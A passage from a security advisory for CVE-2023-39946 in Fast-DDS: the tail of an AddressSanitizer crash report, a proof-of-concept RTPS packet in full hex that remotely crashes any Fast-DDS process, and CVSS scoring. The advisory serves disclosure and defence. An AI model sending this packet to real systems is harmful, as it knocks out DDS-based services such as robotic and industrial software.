  0x0c2c7fff8d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2c7fff8d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2c7fff8da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2c7fff8db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2c7fff8dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==68865==ABORTING

PoC

Run any fastdds process on domain 0.
Send the following RTPS packet to 127.0.0.1:7400:

0000   52 54 50 53 02 02 ff ff 01 0f 45 d2 b3 f5 58 b9
0010   01 00 00 00 15 05 00 00 00 00 10 00 00 01 00 c7
0020   00 01 00 c2 00 00 00 00 01 00 00 00 00 03 00 00
0030   50 00 10 00 ff ff ff ff ff ff ff ff ff ff ff ff
0040   ff ff ff ff 59 00 08 00 01 00 00 00 ff ff ff ff
0050   ff ff ff ff

Impact

This can remotely crash any Fast-DDS process.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

CVE ID

CVE-2023-39946

Weaknesses

Credits